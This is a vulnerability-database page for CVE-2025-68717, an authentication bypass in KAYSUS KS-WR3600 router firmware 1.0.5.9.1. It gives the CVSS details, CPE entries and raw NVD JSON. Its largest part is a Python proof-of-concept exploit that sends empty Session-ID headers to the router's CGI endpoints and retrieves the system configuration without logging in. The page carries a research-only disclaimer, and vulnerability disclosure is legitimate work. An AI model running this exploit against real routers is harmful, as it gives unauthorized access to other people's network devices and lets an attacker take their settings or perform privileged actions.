Security Vulnerability Report
中文
CVE-2025-68717 CVSS 9.4 CRITICAL

CVE-2025-68717

Published: 2026-01-08 21:15:43
Last Modified: 2026-02-02 16:35:49
Source: [email protected]

Description

KAYSUS KS-WR3600 routers with firmware 1.0.5.9.1 allow authentication bypass during session validation. If any user is logged in, endpoints such as /cgi-bin/system-tool accept unauthenticated requests with empty or invalid session values. This design flaw lets attackers piggyback on another user's active session to retrieve sensitive configuration data or execute privileged actions without authentication.

CVSS Details

CVSS Score
9.4
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L

Configurations (Affected Products)

cpe:2.3:o:kaysus:ks-wr3600_firmware:1.0.5.9.1:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:kaysus:ks-wr3600:-:*:*:*:*:*:*:* - NOT VULNERABLE
KAYSUS KS-WR3600 固件 1.0.5.9.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-68717 PoC - KAYSUS KS-WR3600 Authentication Bypass # Target: KAYSUS KS-WR3600 Router with firmware 1.0.5.9.1 target_ip = "192.168.1.1" # Router IP address target_port = 80 def exploit_auth_bypass(): """ Exploit authentication bypass in KAYSUS KS-WR3600 The vulnerability allows unauthenticated access to privileged endpoints by sending requests with empty or invalid session values. """ # Target endpoints vulnerable to authentication bypass endpoints = [ "/cgi-bin/system-tool", "/cgi-bin/status", "/cgi-bin/config" ] headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "Session-ID": "", # Empty session - bypasses authentication "Content-Type": "application/x-www-form-urlencoded" } print(f"[*] Testing CVE-2025-68717 on {target_ip}") print(f"[*] Target: KAYSUS KS-WR3600 Firmware 1.0.5.9.1") for endpoint in endpoints: url = f"http://{target_ip}:{target_port}{endpoint}" try: # Send request with empty session to bypass authentication response = requests.get(url, headers=headers, timeout=10) print(f"\n[+] Endpoint: {endpoint}") print(f" Status: {response.status_code}") if response.status_code == 200: print(f" Result: AUTHENTICATION BYPASSED") print(f" Response Length: {len(response.text)} bytes") if len(response.text) > 0: print(f" Sample: {response.text[:200]}...") else: print(f" Result: Request blocked or not vulnerable") except requests.exceptions.RequestException as e: print(f"[-] Error accessing {endpoint}: {str(e)}") def check_system_info(): """ Retrieve sensitive system configuration without authentication """ url = f"http://{target_ip}:{target_port}/cgi-bin/system-tool" headers = { "Session-ID": "", # Empty session bypasses auth "User-Agent": "Mozilla/5.0" } data = { "action": "get_config", "section": "system" } try: response = requests.post(url, headers=headers, data=data, timeout=10) if response.status_code == 200: print("\n[+] Retrieved system configuration:") print(response.text) except Exception as e: print(f"[-] Failed to retrieve config: {str(e)}") if __name__ == "__main__": print("=" * 60) print("CVE-2025-68717 - KAYSUS KS-WR3600 Auth Bypass PoC") print("CVSS Score: 9.4 (CRITICAL)") print("=" * 60) exploit_auth_bypass() check_system_info() print("\n[*] PoC completed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68717", "sourceIdentifier": "[email protected]", "published": "2026-01-08T21:15:43.353", "lastModified": "2026-02-02T16:35:48.640", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "KAYSUS KS-WR3600 routers with firmware 1.0.5.9.1 allow authentication bypass during session validation. If any user is logged in, endpoints such as /cgi-bin/system-tool accept unauthenticated requests with empty or invalid session values. This design flaw lets attackers piggyback on another user's active session to retrieve sensitive configuration data or execute privileged actions without authentication."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 5.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:kaysus:ks-wr3600_firmware:1.0.5.9.1:*:*:*:*:*:*:*", "matchCriteriaId": "5A325820-C480-454D-9A4F-AC61604C5566"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:kaysus:ks-wr3600:-:*:*:*:*:*:*:*", "matchCriteriaId": "B2859021-9B27-47E2-9802-AE453C915F8D"}]}]}], "references": [{"url": "https://github.com/actuator/cve/blob/main/KAYSUS/CVE-2025-68717.txt", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/actuator/cve/tree/main/KAYSUS", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.kaysus.com/ks_wr3600__wifi_7_be3600_wireless_router.html", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.